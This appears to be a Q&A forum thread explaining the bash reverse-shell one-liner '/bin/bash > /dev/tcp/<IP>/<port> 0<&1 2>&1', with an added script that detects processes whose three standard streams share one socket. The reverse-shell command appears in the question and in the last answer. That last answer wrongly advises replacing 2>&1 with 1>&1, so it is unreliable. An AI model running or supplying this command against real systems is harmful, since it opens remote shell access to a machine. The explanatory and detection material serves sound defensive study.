
Testing Bash Reverse Shell

I am testing a reverse shell using the tutorial found here.

I have some questions about the meaning of the commands used. The command to run on the server is the following:

/bin/bash > /dev/tcp/<IP>/<port> 0<&1 2>&1

I want to double check its meaning. Based on my understanding:

  • Start a bash shell
  • Redirect output of the shell to TCP connection <IP>:<port>
  • 0<&1 : Redirect Input from connection &1 to stdin 0
  • 2>&1 : Redirect output from stderr 2 to connection &1

Is the above correct?

Yes, it's correct; the goal is for all three FDs -- stdin, stdout, and stderr -- to be pointing to your TCP connection.

Note that this command needs to be run in a bash compiled with /dev/tcp, which is an optional feature provided by the shell itself, not the operating system; moreover, this means that something like system(), which uses /bin/sh, typically won't work to invoke it.
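The fd layout the answer above describes (stdin, stdout and stderr all duplicated onto one TCP socket) is also what a defender can look for. The following POSIX sh script is an added example and is not from the original question or answers: check_fd_dir inspects a /proc/<pid>/fd-style directory and reports whether fds 0, 1 and 2 all resolve to the same socket, and scan_proc applies it to every process on a Linux host. The sample fd tables it builds with symlinks are constructed for the demonstration and do not correspond to real processes.

```sh
#!/bin/sh
# Added example (not part of the original post): detect processes whose
# stdin, stdout and stderr all point at one socket, the fd layout produced by
# "/bin/bash > /dev/tcp/<IP>/<port> 0<&1 2>&1". On Linux the fd table is
# /proc/<pid>/fd, a directory of symlinks whose targets read "socket:[inode]".

# check_fd_dir DIR
#   Returns 0 when DIR/0, DIR/1 and DIR/2 all resolve to the same socket,
#   1 otherwise (including when any of the three fds is missing).
check_fd_dir() {
    dir=$1
    t0=$(readlink "$dir/0" 2>/dev/null) || return 1
    t1=$(readlink "$dir/1" 2>/dev/null) || return 1
    t2=$(readlink "$dir/2" 2>/dev/null) || return 1
    # all three must be the same target ...
    [ "$t0" = "$t1" ] && [ "$t1" = "$t2" ] || return 1
    # ... and that target must be a socket, not a tty, pipe or file
    case "$t0" in
        socket:*) return 0 ;;
        *)        return 1 ;;
    esac
}

# scan_proc
#   Walks /proc on a Linux host and prints "pid cmdline" for every match.
#   Needs enough privilege to read other users' fd tables (usually root).
scan_proc() {
    for d in /proc/[0-9]*/fd; do
        [ -d "$d" ] || continue
        if check_fd_dir "$d"; then
            pid=${d#/proc/}; pid=${pid%/fd}
            printf '%s %s\n' "$pid" \
                "$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)"
        fi
    done
}

# make_sample
#   Builds two constructed fd tables under a temp dir and prints its path:
#   "shell" mimics the reverse-shell layout, "normal" an ordinary process on a pty.
make_sample() {
    base=$(mktemp -d)
    mkdir -p "$base/shell/fd" "$base/normal/fd"
    for n in 0 1 2; do ln -s 'socket:[12345]' "$base/shell/fd/$n"; done
    for n in 0 1 2; do ln -s '/dev/pts/0'     "$base/normal/fd/$n"; done
    printf '%s\n' "$base"
}

# Run the check against the constructed samples (offline, no real processes).
SAMPLE=$(make_sample)
check_fd_dir "$SAMPLE/shell/fd"  && echo "sample 'shell': fds 0,1,2 share one socket"
check_fd_dir "$SAMPLE/normal/fd" || echo "sample 'normal': no match"
```

To use it on a live Linux host, call scan_proc as root. The heuristic keys on the fd layout rather than on the /dev/tcp syntax, so it sees the same pattern whether bash's built-in /dev/tcp or another tool produced the socket; expect a few legitimate hits (inetd-style services that are handed a socket on all three fds) and treat the output as a triage list, not a verdict.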

For STDOUT, use 1>&1, because 2 will redirect the STDERR stream.

So your command should be: /bin/bash > /dev/tcp/<IP>/<port> 0<&1 1>&1
